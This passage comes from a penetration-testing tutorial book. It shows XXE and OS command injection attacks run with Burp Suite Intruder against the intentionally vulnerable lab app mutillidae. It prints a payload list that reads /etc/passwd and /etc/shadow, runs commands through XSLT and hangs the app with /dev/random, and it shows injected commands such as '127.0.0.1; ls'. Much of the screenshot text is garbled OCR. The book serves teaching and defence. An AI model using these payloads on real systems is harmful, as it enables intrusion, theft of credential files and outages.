re a simple is | iat of strings th | hat are used a | es payloads. | | | | | | | | | | | | | | |
| Payload O
This paylead ty
Pasta
Load
Remove
Clear | ptions (Simp)
pelets you configu | le list]
re a simple li | at of strings th | nat are used a | n payloads. | | | | | | | | | | | | | | |
| Payload O
This payload ty
Paste
Load
Remove
Clear
Add | ptions (Simpl
pe lets you configu | le list)
re a simple li | at of strings th | the are used a | n payloads. | | | | | | | | | | | | | | |
| Payload O
Tris payload ty
Paste
Load_
Remove
Clear
Add
Add from list | ptions (Simp)
pe lets you configu
Enter a new item
 | ie list)
re a simple in
vi | at of strings th | hat are used a | n payloads. | | | | | | | | | | | | | | |
| Payload O
This payload ty
Pasta
Load_
Remove
Clear
Add
Add from list | ptions (Simpl
pe lets you configu
(Enter a new item
(Pro version and | ie list)
re a simple is
vi | nt of strings th | nat are used a | n payloadh | | | | | | | | | | | | | | |
| Payload O
This payload ty
Paste
Load
Remove
Clear
Add
Add from list | ptions (Simpl
pe lets you config. | ie list)
re a single is
vi | at of strings th | hat are used a | n payloads | | | | | | | | | | | | | | |

Figure 8-8. The Payload section of the Intruder tool in Burp Suite

From the Payload Options, click the Load button. It will open up a window to load the XML file where you have written all the XXE injection code (Figure 8-9).

| | Burp Suite Community Edition v1.7.36 - Temporary Project | e o x |
|---|--|--------------|
| Burp Intruder Repeater Window Help | | |
| Target Provy Spider Scanner Intruder Repeater Separ | ncer Decoder Comparer Extender Project options User options Alerts xssValidator | |
| 1 2 2 | | |
| Target Postions Payloads Options | | |
| Payload Sets You consider one or more payload sets. The number of payload
different mays. Payload set. Payload type: Strende lat: Payload type: Strende lat: The payload type lats() The payload type lats() | Les la participa de la partici | Start attack |
| Pata
Cali
Revox | Filegene ministedetet
Filegene Afrike
Filesofijoe Afrike
Open Caned | ſ |
| Add Enter a new item | | |
| | | |
| Add from list [Pro version only] | 5 | |

Figure 8-9. The opening window to load the XML file full of XXE injection code

The next code shows xml-attacks.txt. We have collected all the XXE injection code in one place. You can add more entities to make this payload more agile and robust to retrieve more types of system data, or you can manipulate the internal logic of the application. A very good free resource is GitHub. You can check this link: https://github.com/ swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection.

//code 8.10

```
<?xml version="1.0" encoding="ISO-8859-1"?>
<xml SRC="xsstest.xml" ID=I></xml>
<HTML xmlns:xss><?import namespace="xss" implementation=</pre>
"http://sanjibsinha.fun/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<HTML xmlns:xss><?import namespace="xss" implementation="http://</pre>
sanjibsinha.fun/xss.htc">
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/</pre>
XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template</pre>
match="/"><script>alert(123)</script></xsl:template>
</xsl:stylesheet>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/</pre>
XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template</pre>
match="/"><xsl:copy-of select="document('/etc/passwd')"/>
</xsl:template></xsl:stylesheet>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/</pre>
XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template</pre>
match="/"><xsl:value-of select="php:function('passthru',</pre>
'ls -la')"/></xsl:template></xsl:stylesheet>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM
"file:///etc/shadow" >]>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM
"file:///c:/boot.ini" >]>
```

```
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM
"http://example.com/text.txt" >]>
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM
"file:////dev/random">]>
<!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.
txt"> ]> <change-log > <text>&systemEntity;</text> </change-log>
<!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM
"../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text>
</change-log>
<!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM
"../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text>
</change-log>
<!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM
"../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text>
</change-log>
<!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.
txt"> ]> <change-log> <text>&systemEntity;</text>
</change-log>
```

Select this file to load all the XXE injection attacks. Once it has been loaded (Figure 8-10), we can launch the Intruder attack.



Figure 8-10. Launching the XXE attack

Once the attack has been started, it will start examining all the XML external entities code. It may take time, but after a few minutes we can click the payload Length column and select the highest value retrieved so far (Figure 8-11).

p Intruder Repeater Window Help	() () () () () () () () () ()				den den e				1	
rget Proxy Spider Scanner Intruder P					ntrudera	attack 1		000		
× 2 =	Attack Save Co	a Laurine Laurin	to Tanto							
rget Postions Payloads Options	Elber Cherina d	et Postooris Pwylow	as Opeo					6	2	
Payload Sets	Real A Park	and and	Chat-on	Error	Times	Leorth	Comment			Start attack
You can define one or more payload sets. The n different ways. Payload set: 3 * Payload type: Simple list *	Negating Page 0 1 1 2 <100	vi version*1.0* enco 2CT/PE xxe [ENIT<br 2CT/PE xxe [ENIT<br version*1.0* enco vi version*1.0* enco vi version*1.0* enco vi version*1.0* enco	200 200 200 200 200 200 200 200 200 200	000000000000000000000000000000000000000	0000000000	40681 48780 48772 47565 40061 47635 47554 49192 40936	Continent		a bad type can be customized in	
Payload Options [Simple list] This payload type lats you configure a simple list	9 «7ы» 10 «7ы» 11 «7ы» 12 «7ы»	n! version="1 0" enco n! version="1 0" enco n! version="1 0" enco n! version="1 0" enco	200 200 200 200		0000	47820 48995 48991 48936			•	
Pata Christ water-1 0 ⁴ exceedings Christ water-1 0 ⁴ excee										
Add Enter a new item										
Add from list [Pro version only]										

Figure 8-11. Checking the Payload length in the Intruder tool

Once you click the largest value you have got, you will see the request you have sent to the mutillidae application (Figure 8-12).

Applica	ntions • Places •	📲 co	m-instal	14j-runti	me-launcher-UnixLauncher 🔻	Tue 01:57	1 =	Φ	*
						Intruder attack 1	0	Θ	0
Attack S	ave Columns								
Results	Target Positions Paylo	ads Opti	ens						
Filter: Sho	owing all items								
Request	Payload	Status	Error	Timeo	Length Y Comment				
24	«?xml version="1.0" enco	200	0	Ū.	40942				
8	<7xml version=*1.0* enco	200			48936				- 12
12	<7xml version#*1.0* enco	200			40936				- 8
10	<7xml version=*1.0* enco	200			40905				- 5
16	<7xml version="1.0" enco	200			40931				- 1
4	<7xml version#"1.0" enco	200			40061				
1	<7xml version="1.0" enco	200			48780				
2	<idoctype td="" xxe[<!entit_<=""><td>200</td><td></td><td></td><td>49772</td><td></td><td></td><td></td><td></td></idoctype>	200			49772				
•		200	<u></u>		40581				
9	<7xml version#"1.0" enco	200			47820				
2	< fxml version="1.0" enco	200			47633				
	«IDOCTYPE xxe[«IENTIT	200			47566				1
•	# LYLLE ABL2001# . T.O., BLCO.	200	-		4/304				
Request	Response								
Raw I	Params Headers Hex								_
URT I		_		_			_	_	
/mutillid	lae/index.php?page=xel-val	idator.pl	pixal-13	Alfaels20	version%3d%221%2e0%22%20encoding%	34/22250-8659-1/22/3F/34/3c100CT/PE/20Fo/20[13c16LEMERT/20Fo/20A0/A/20/34/3c1EMETT/20xx4/205/5TEM/20/3	221:1443	W2f	1
12142fc43	sh2fboot%2eini%22%20%8e]%	Bedanl-vi	lidator-p	shp-subsit	-buttor=Validate+IML HTTP/1.1				
4ost: 192	168.2.8			And a state	and a standard and a				
aser-Agen	C Pozatta/5.0 (111; Line of Odal and Lotting Odal)	1 420 64	PV:60.0	oecko/20	100101 Parefox/60.0				
scopt. t	extrites, approximite	it want , app	PLACARLAD'S	war' d.o. 5	-y-, d-a, a				
breent . Fry	coding min deflate								
laferer:	http://192.168.2.3/mutill	idee/inde	x, pho?pad	lev-lastes	idator.pho5xml=idnf4xml-validator	-ohe-submit-buttor#Validate#XML			
Cookie: s	howhints=1; PMPSESSID=j8s	fqa7c1du	1871/601638	Aq3015; ac	opendivide swingset, jotto, phpbb2,	redeine; acgroupswithpersist=nada			
WT: 1									
Connectio	n: close								
upgrade-1	nsecure-Requests: 1								
[020] (S	< + > 7)pe # 1	search terr	19					0 ma	tches
6 of 116									

Figure 8-12. The request we have sent to the "mutillidae" application

We can also check the response by clicking the Response tab (bottom half of Figure 8-13).

Applica	ntions • Places •	1 co	m-instal	14j-runti	me-launcher-UnixLaunch	er 🕶 Tue 02:11 🚺 🖓 🖌 🕫	0.
						Intruder attack 1	00
Attack 5	ave Columns						
Reputs	Target Positions Paylo	ads Opti	iona				
Filter: Shi	owing all items						0
Request	Payload	Status	Error	Timeo	Length T Comment		
7	<7xml version=*1.0* enco	200	0	0	49258		
18	<7xml version="1.0" enco	200			49064		
22	<7xml version#"1.0" enco	200			49057		
15	<7xml version="1.0" enco	200			49054		_
14	<7×ml version#*1.0* enco	200			49008		
	<7xml version="1.0" enco	200			49002		
12	<7xml version#*1.0* enco	200			49002		
20	<"xrnf version#"1.0" enco	200			49001		
16	«7xml version»"1.0" enco.	200			40997		
	<7xml version#"1.0" enco	200			40927		E .
2	< none version**1.0* enco	200			43545		
2	<idoctvpe td="" xxe[<!entit.<=""><td>200</td><td></td><td></td><td>40030</td><td></td><td></td></idoctvpe>	200			40030		
~		200	0		49/4/		
Request	Response						
Raw	Headers Hex HTML Re	ender					
WTTP/1 1	300.00						12
Date: Tue	05 Aug 2019 05:10 41 08	et l					-
Server: A	pache/2 2.14 (Ubuntu) mod	ecno/2.4	1.3 PPP/5.	3.2-lubur	tu4 30 with Subosin-Patch or	vay hts]/3.0.1 mod ovthon/3.3.1 Python/2.6.5 mod mt]/2.2.14 GerdSL/0.5.8k Plassion Passencer/4.0.38 mod cerl/2.0.4	
Perl/v5.1	0.1						-
X-Powered	By: PHP/5.3.2-Jubuntu4.3	0					
Logged-In	User						
Vary: Acc	ept-Encoding						
Content-L	ength: 48839						
Connectio	n: close						
Content-T	ype: text/htsl						
<100CTYPE	HTML POBLIC "-//WJC//DTD	HITE, 4.4	P2 Transit	tional//EN	" "bttp://www.w3.org/18/1999	V/REC+0186-402+29992224/Loose.dtd*>	
Contract >							
	< + > 7ice + 1	iearch terr	19				Omatches
16 of 116							

Figure 8-13. The Response coming from the "mutillidae" application

But we are eager to see how the XXE injection has rendered the output in the mutillidae application. Through our XXE injection we have sent a lot of attacking code that can even hang the application. Consider this type of payload:

//code 8.11

```
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////
dev/random">]>
```

It can stop any application by hanging it using an infinite loop that loads all types of random data. For that reason, the payload takes a long time.

We can see the rendered figure of the application mutillidae now (Figure 8-14).



Figure 8-14. The rendered figure of the application "mutillidae"

It has taken the first XXE injection code and rendered all the passwords of the application (Figure 8-15).

Applications - Place	es 🔻 🔰 com-install4j-runtime-launcher-UnixLauncher 👻 Tue 02:12 🔳 🕫	1	ب 0
	Intruder attack 1	0 0	• •
Attack Save Columns			
Results Target Positions	Payloads Options		
Filter: Showing all items			0
Request Payload	Status Error Trnee. Length T Comment		
7 <7 tarrel version="1.0" 18 <7 arrel version="1.0"	arco. 200 ■ 49259 arco. 200 ■ 49064		Ę
Request Response			
Raw Headers Hex HTM	A. Render		
Documentation	Please Enter XML to Validate		
Getting Started: Project Whitepaper	XML		
Release Announcements	Values me. XML Submitted <7xml version=*1.0* encoding=*ISO-8859-1*7> <idoctype (<ielement="" any="" foo=""><ientity *file:="" etc="" pas<="" system="" td="" xxx=""> >> > >> > > > xt Content xt<</ientity></idoctype>	swd* xl/lpd:/bi x/bin:/bi n/sh	in/sh

Figure 8-15. All the passwords of the application "mutillidae"

It gives you the same output we have seen before in code 8.2. Therefore, let us cut it short.

//code 8.12

```
XML Submitted
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY xxe
SYSTEM "file:///etc/passwd"> ]><text>&xxe;</text>
Text Content Parsed From XML
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/
sbin:/bin/sh bin:x:2:2:bin:/bin/sh sys:x:3:3:sys:/dev:/
bin/sh sync:x:4:65534:sync:/bin/sync games:x:5:60:games:/
usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/
bin/sh .....
```

Since we have written this XXE injection code at the top of the xml-attacks.txt file, it renders first. You can test another injection vector and see the output.

As a pen tester, you can suggest a few remedies to your client. The application should validate or sanitize user input before incorporating it into an XML document; it is also good to block any input containing XML metacharacters such as <and>. These characters can be replaced with the corresponding entities: >and<.

CHAPTER 9

Finding Command Injection Vulnerabilities

A server that is running an application can be compromised using arbitrary operating system (OS) commands if there are certain types of web security vulnerabilities. These commands compromise the application and all its data. Not only that, an attacker can take advantage of OS command injection vulnerabilities to compromise other parts of the hosting infrastructure and finally, attack other applications related to the compromised one.

As a penetration tester, your job is to find whether an attacker can run a script into the users' browser to inject such shell commands. Usually the attackers use an input point to inject shell commands into the web site. The web site takes the input. In such cases, the target site doesn't suspect anything and if there are vulnerabilities, it is in no position to resist those attacks. As a pen tester, you should also know the difference between OS command injection and code injection.

Code injection allows the attacker to add their code, which is then executed by the application. The OS command injection does not act the same way. The attacker only extends the default functionality of the application. The application then executes system commands.

As a penetration tester, your job will be to find out whether the application passes unsafe user-supplied data through forms, cookies, or HTTP headers, etc. The vulnerable application normally allows the execution of arbitrary commands on its host operating system.

Discovering OS Command Injection

Discovering errors in coding or security loopholes in software, operating systems, or networks is done by fuzz testing. Our attempt to make it crash involves inputting a massive amount of data called fuzzing.

Whether the application has vulnerabilities can be determined by fuzzing with commands separators such as ";", "&", "&&", "|", and "||". These command separators vary from one operating system to another. What works on Linux may not work on Windows.

We will do that in a moment with the help of mutillidae, an intentionally vulnerable web application. We will look for errors that are related to the operating system. We will also look for some unusual output in the response.

In our virtual lab, let us open the OWASP broken web applications and click "mutillidae." We will start with the DNS Lookup section (Figure 9-1).



Figure 9-1. Commands injection and DNS Lookup in mutillidae

Let's issue commands separated by ; in the DNS Lookup field.

//code 9.1

127.0.0.1; ls

We get this output (Figure 9-2), where the whole directory listing is visible.



Figure 9-2. Results for the OS commands injection on mutillidae

The output is quite straightforward; furthermore, it assures us that more OS commands injection are possible in this application.

//code 9.2

Server: 10.13.4.1
Address: 10.13.4.1#53
1.0.0.127.in-addr.arpa name = localhost.
add-to-your-blog.php
ajax
arbitrary-file-inclusion.php
authorization-required.php

```
back-button-discussion.php
browser-info.php
capture-data.php
captured-data.php
captured-data.txt
classes
client-side-control-challenge.php
credits.php
data
database-offline.php
directory-browsing.php
dns-lookup.php
document-viewer.php
documentation
framer.html
framing.php
hackers-for-charity.php
home.php
html5-storage.php
images
includes
index.php
installation.php
javascript
level-1-hints-page-wrapper.php
login.php
owasp-esapi-php
page-not-found.php
password-generator.php
passwords
pen-test-tool-lookup-ajax.php
```

pen-test-tool-lookup.php php-errors.php phpinfo.php phpmyadmin phpmyadmin.php privilege-escalation.php process-commands.php redirectandlog.php register.php rene-magritte.php repeater.php robots-txt.php robots.txt secret-administrative-pages.php set-background-color.php set-up-database.php show-log.php site-footer-xss-discussion.php source-viewer.php sqlmap-targets.php ssl-enforced.php ssl-misconfiguration.php styles styling-frame.php styling.php test text-file-viewer.php upload-file.php usage-instructions.php user-agent-impersonation.php user-info-xpath.php

```
user-info.php
user-poll.php
view-someones-blog.php
view-user-privilege-level.php
web-workers.php
webservices
xml-validator.php
```

Now we have a fair knowledge about how OS commands injection works in web applications with vulnerabilities. In the next section we will do some more commands injection with the help of Burp Suite.

However, before that, we can check the power of those commands separators on our terminal. We can issue a ping command to the localhost; it will respond with some packets. That is quite normal in any situation. Instead of a single ping command, if somebody slips in some malicious separators and does the commands injection, see what happens (Figure 9-3).



Figure 9-3. Monitor scanning and the commands injection

Let us have a look at the output so that we understand what has happened after the ping gives us its usual output.

```
//code 9.3
//monitor scanning
root@kali:~# ping -c 1 127.0.0.1; ls
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.031 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time Oms
rtt min/avg/max/mdev = 0.031/0.031/0.031/0.000 ms
Desktop Downloads Music Public Videos
Documents juice-shop Pictures Templates xml-attacks.txt
```

As you see, after the ping command finishes its journey, the command separator (here we have used ;) slips in the ls command and it gives us this output at the last line.

//code 9.4

Desktop	Downloads	Music	Public	Videos
Documents	juice-shop	Pictures	Templates	<pre>xml-attacks.txt</pre>

Although this is not OS command injection, it shows us a good example of how we can exploit the system with a single separator and the commands injection code.

Injecting and Exploiting Malicious Commands

In this section, we will see how we could inject malicious commands and exploit them to test whether a web application has vulnerabilities or not. Since most user accounts have permission to execute directory listings

by default, we can try to inject operating system commands, such as ls and dir. The first one will execute on Linux and the second one will work on Windows. These commands will run in the context of a web server user, not a normal user. Here, we will use Burp Suite to inject malicious commands into the application mutillidae. We will exploit it by comparing the two responses. A typical simple request to the server will give us a response with a certain content length. However, when we inject malicious commands, the content length becomes longer.

While, as a penetration tester, you are injecting malicious commands, all you need to remember is that Windows will not execute 1s and Linux will not execute dir. Here, we will test the malicious commands injection on the web application mutillidae, which runs on the Linux server. So we will use 1s.

In the first step, let us open mutillidae and pass the response flow through Burp Suite. Sometimes it appears cumbersome to find a certain application that we want to concentrate on. The Scope tool of Burp Suite provides a good way to quarantine that application. From the target, we will add only mutillidae to our scope. Click the second mouse button and add it to the Scope (Figure 9-4).

мрри	cations • Places • 📕 col	m-instau+j-runtime-iauncher	Burn Suite Communit	Fdition of 7.36 - Tempo	arany Droject			- / 4 0 -
Barro da	structur Responder Window Mala		burp suice communic	A Edition AT1-20 - Lembe	stary Project			
Tarnet	Prov Soler Scever Listrater	Reseater Sessencer Decoder	Comparer Extender P	nied actions I User actions I .	Nerts Tussicalidate	-		
	a loss book book book	Contracting Street Street Street Street		der der al an allen l				
100000			Income of each of each	- And the second second second	e enable			
-	idea and found have been state in some	descubles autot bides to se	copping or our drifting		e e ave			
- 10.00	ang na sena sena, nang css, mage ar	-*	portes, many empty toper		1 Int.	1	1	
1	Filter by request type	Filter by MIME type	Filter by status code	Folders	164	Convinent	28.28.35 8.	
0	📄 Show only in-scope items	🖉 HTML 🕑 Other text	2xx (success)	Hide empty folders			23 23 50 8	
	Show only requested items	Soript 📄 Images	Bixx [redirection]				23 23 36 8	
	Show only parameterized requests	2 XML 2 Flash	4xx (request error)				23 23 36 8	
		Cos Cone erary	S and (server entry)				28 28 36 8 29 29 36 8	
	Filter by search term (Pro only)	Filter by Re extension	Fiter	by annotation			23 23 36 8	
		Show only: asp.aspx.isp.	the o	the set of the set of the set	-			
	E Reper			then only torificated kerns				
	📄 Case sensitive 🛛 📄 Negative sea	rch Hide: ja.gif.jpg.png/		and any repayred cars				
	Show al Hide al Revert cha	nges						
Ď	joorria	Accept-Language: en-US, en; p=0.	5					
E	jquery.min.js manifactustrate.forms.istral	Referer: http://192.160.2.2/						
D	mono	Connection: close						
	mutilidae	Upgrade-Insecure-Requests: 1						
2	onelner_intro.php orangehrm							
P	owaspbridis							
10	nind87							

Figure 9-4. Adding "mutillidae" to Scope of Burp Suite

Select the "Show only in-scope terms" in the "Filter by request type" section. Once it is done, the application mutillidae will show up in the Target and Sitemap section of Burp (Figure 9-5).

Applications - Places - 🔋 co	om-install4j-runtime-l	launcher	-UnixLauncher -		Thu 23	:47				1	12	10	، گ
6			Burp Suite Com	munity E	dition	v1.7.36	- Tempora	ry Project				0 0	
Burp Intruder Repeater Window Help													
Target Proxy Spider Scamer Intruder	Repeater Sequencer	Decoder	Comparer Extend	ler Proje	et option	User	options Aler	ts xssValidator					
Stammen Score	1					-	-				-		
Filter: Hidrog out of scope and not found items: his	ino CSS, image and general b	inary conte	ert: Nidoo 4cc respons	es hidro	erraty fo	Aders -							10
Y // http://192.168.2.2	Hart	Mathead	101	Parama	5 a . a	Landh	MME ture	Tela	Comment	Time requ			
D mutilidae	Here (21 0 2 1 (20 2 2	OFT	In this	10.000	200	443.24	MTM.	1.000		22.22.25.8			10
mutilidae	Http://192.168.2.2	OFT	Investigation and an and		200	48496	HTML			2828508			-
	http://192.168.2.2	POST	Invutilidae/index.php	1	200	50036	HTML			23 25 25 8			- 1
	http://192.168.2.2	GET	/mutilidae/javascript/		200	1541	script			23:23:36 8			1
	http://192.168.2.2	GET	Invutilidaesjavascript/		200	9116	script			23.23.36 0			- 1
	http://192.168.2.2	GET	/mutilidae/javascript/		200	57788	script			23 23 36 8			
	http://192.168.2.2	GET	/mutilidaejavascript/		200	10323	script			23 23 36 0			
	Http://192.168.2.2	GET	/mutilidaejavascript/		200	11816	script			28.28.36.8			
	http://192.168.2.2	GET	/mutilidae/javascript/	8.82	200	268220	script			22.23.36 8			- 8
	Http://192.168.2.2	130	/mubilidae/7page=ad	1			HTML						
	Present Preport	** P/1.1 5.0 (X11; plication 05, ex, q=0 p, deflat 160.2 2/ wests 1	Linux x8€_64, rv: Vuhtel+xml, applicat €	50.0) Geo	ko/2010 œ0. 5, */	1101 FAr	efox/60.0						Î
		• 7	ipe a search term									0	matche

Figure 9-5. The application "mutillidae" has been added to Burp Suite Scope

Next, we will see the response on Target and Sitemap (Figure 9-6) and we will send that response to the Repeater. Keeping the Intercept on, click the second mouse button on the response and send it to the Repeater (Figure 9-7).

Applications * Places *	com-install4j-runtime	launche	r-UnixLauncher 🕶		Thu 23	3:48					¥ / 40 ° -
			Burp Suite Com	munity E	Edition	v1.7.36	- Tempora	ry Project			000
Burp Intruder Repeater Window Help											
Tarnet Proce Solder Scarver Liet	ruder TReseater TSessencer	Decoder	Comparer Estend	lar I Prois	ed option	u Lusar	untions T Alex	ts I use/abdator			
						1					
Stemap Scope											
Filter: Hiding out of scope and not found item	s; hiding CSS, image and general	binary cont	ent; hiding 4xx respons	ies: hidrog	empty fe	olders					2
¥ /// http://192.169.2.2	Host	Method	URL	Pararris	Sta. 4	Length	MIME type	Title	Comment	Time requ	
D mutilidae	Http://192168.2.2	OET	Instillidan'		200	46124	HTML			23 23 35 8	1
mutilidae	Http://192168.2.2	GET	Insubilidae/index.php	1	200	48495	HTML			2323508	-
	http://192.168.2.2	POST	mutilidaeindex.php_	1	200	50036	HTML			23 25 25 8	
	http://192.168.2.2	GET	/mutilidae/javascript/		200	1541	script			23 23 36 8	
	Http://192.168.2.2	067	Investigation in the second se		200	9116	script			23:23:36 0	
	http://192.168.2.2	GET	/mutilidaejavascript/		200	57788	script			22.23.36.8	
	http://192.168.2.2	GET	/mutilidaejavascript/		200	10923	script			23:23:36 0	
	Http://192.168.2.2	OET	Invitilidaejavascript/		200	11816	script			23 23 36 8	
	http://192.168.2.2	OET	/mutilidae/javascript/		200	268220	script			23 23 36 8	
	http://192.168.2.2	OET	/mubilidae/7page=ad	~			HTML				
	HR011192.168.2.2	061	produktan/spage=or.	~			HIML				1.0
	[Report Report										
	Loopers Loopers										
	Raw Headers H	Inx HTM	L Render								
	HTTP/1.1 200 CK		bet start								
	factors leadbard 2	14 (threat)	20 Uni		A.derman	4 10	C. Annin Pa	the factor and the factor	0.1 and author (2.2	1 Bathani 2 6 5 and and (2 3	14
	(nen55) /0 3 Rk Phut	ion Panner	mar/4 0 35 and nar	1/2 0 4 1	hard run	10.1	1 30 00 21-0 8	icen proxy_nearly a	o. a most pycholo a. a	a ryunaya.o. y mogantia.a	
	X-Povered-By: PHP/5	3.2-lubu	ntu4.30								
	Set-Cookie: PHPSESS	ID- =329900	vilováriósuðos (dilqupi	1; pather	· · · · · · · · · · · · · · · · · · ·						
	Set-Cookie: showhin	1 941									
	Logged-In-User:										
	Vary: Accept-Encoda	ng									
	Content-Length: 456	22									
	Connection: close										
	Content-Type: text/	Tyt.ml.									
	-DOCTYPE HTTL PUBL	IC //W30	C//DTD HTHL 4.01 Tre	insitiona	LITEN-	Thetepi//w	ww.w3.org/7	R/1999/REC-btw140	1-29991224/loose.d	tu">	
	<html></html>										
	<head></head>										
		P	voe a search term								0 matches

Figure 9-6. The response reflected on Target, Sitemap in the Burp Suite

We can see the Header part in the next code snippet.

```
//code 9.5
2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4
Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=m329900gup8bjmo6um5h6vp8v3; path=/
Set-Cookie: showhints=1
Logged-In-User:
Vary: Accept-Encoding
Content-Length: 45622
Connection: close
Content-Type: text/html
```

We have got all the information required for further investigation: information about the PHP version, what type of server is being used, is displayed.

In Figure 9-7, we find that the Repeater tool displays the request that has been made to the application mutillidae.



Figure 9-7. The Repeater tool displays the requests.

On the left-hand panel the Burp Repeater tool has captured the requests. Let us see the code first, so that we will be able to understand more about the application.

//code 9.6

```
//with intercept on, capturing the request
POST /mutillidae/index.php?page=dns-lookup.php HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.2/mutillidae/index.php?page=dns-lookup.php
Content-Type: application/x-www-form-urlencoded
```

```
Content-Length: 61
Cookie: showhints=1; PHPSESSID=m329900gup8bjmo6um5h
6vp8v3; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

target_host=127.0.0.1&dns-lookup-php-submit-button=Lookup+DNS

The output is quite straightforward, as we can read what kind of request we have made: the URL of the application mutillidae, what we have typed on the validate field, etc. Now, we can see the response if we click the Go button.

Therefore, we click the Go button to see the response on the right-hand side panel of Burp Suite (Figure 9-8).



Figure 9-8. The response on the Repeater tool of Burp Suite

Now, we are ready to start the attack. We click the second mouse button on the left panel and send it to the Intruder tool (Figure 9-9).



Figure 9-9. The request on the Intruder tool

Setting the Payload Position in Intruder

To set the Payload position at the right place, we need to click the "Clear" button. It will remove all the special characters that had been attached when it was sent to the Intruder tool. Next, we will insert the payloads into the base requests. Code 9.6 will change to this:

```
//code 9.7
POST /mutillidae/index.php?page=dns-lookup.php HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
```

```
Referer: http://192.168.2.2/mutillidae/index.php?page=dns-
lookup.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Cookie: showhints=1; PHPSESSID=m329900gup8bjmo6um5h
6vp8v3; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
target_host=127.0.0.1 cs ls &dns-lookup-php-submit-
button=Lookup+DNS
```

Watch the last line. We have injected the commands separator (cs) and the malicious command (ls) into the base request. Next, we should add the fuzzing symbol around the commands separator (cs) in the last line.

//code 9.8

```
//fuzzing symbol around the cs command
POST /mutillidae/index.php?page=dns-lookup.php HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.2/mutillidae/index.php?page=dns-
lookup.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
```

```
Cookie: showhints=1; PHPSESSID=m329900gup8bjmo6um5h
6vp8v3; acopendivids=swingset,jotto,phpbb2,redmine;
acgroupswithpersist=nada
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
target_host=127.0.0.1 §cs§ ls &dns-lookup-php-submit-
button=Lookup+DNS
```

Watch the last line; you will see how we have added the fuzzing symbol around the commands separator (cs). We need the fuzzing symbols because Burp Suite will automate the testing technique using those symbols.

Now, we can add the payload types (Figure 9-10).



Figure 9-10. Adding the payload type

We have added these payloads: |, ||, &, and &&. These reserved characters are used to fuzz the command injection. However, each has a separate, defined role.

- 1. The & character is used to separate multiple commands on one command line. It helps run the commands one after another. The preceding command should run successfully.
- 2. The character && helps to inject the malicious commands after that.
- 3. The character || pipes the standard output of the first command to the standard input and it then becomes the second command. In Windows, it has some special roles. What & and && do in the Linux server the || does in the Windows server. It separates the multiple commands on one command line.
- 4. The | pipeline separator is used to give the output of one command to the next command.

Now we can start the attack. The length of the payloads will tell us how the attack is progressing. The very first one is the simple request without any payloads attached to it. However, the rest is different and the length becomes longer (Figure 9-11).

Provy Snider Scarver Jetruder R			Intruder	attack 1		0	• •	
2	Attack Save Columns Results Target Positions	Payloads Options	a				-	
Postions Payloads Options	Filter: Showing all items		<i></i>				0	<u> </u>
Vayload Sets war on define one or more payload sets. The nu ifferent ways. vayload set: 1 * vayload type: Simple lat: *	Pegu. A Paylad 0 1 2 3 & 4 & 66	200 200 200 200 200	Error Timeo	Length 48665 49954 48749 50088 50039	Comment			Start attac
'ayload Options [Simple list] his payload type lets you configure a simple list	e la							
raytoad options (Simple list) his pulsal type list you configure a simple list Parte Laad Ammue Clew				_				

Figure 9-11. Results of the attack

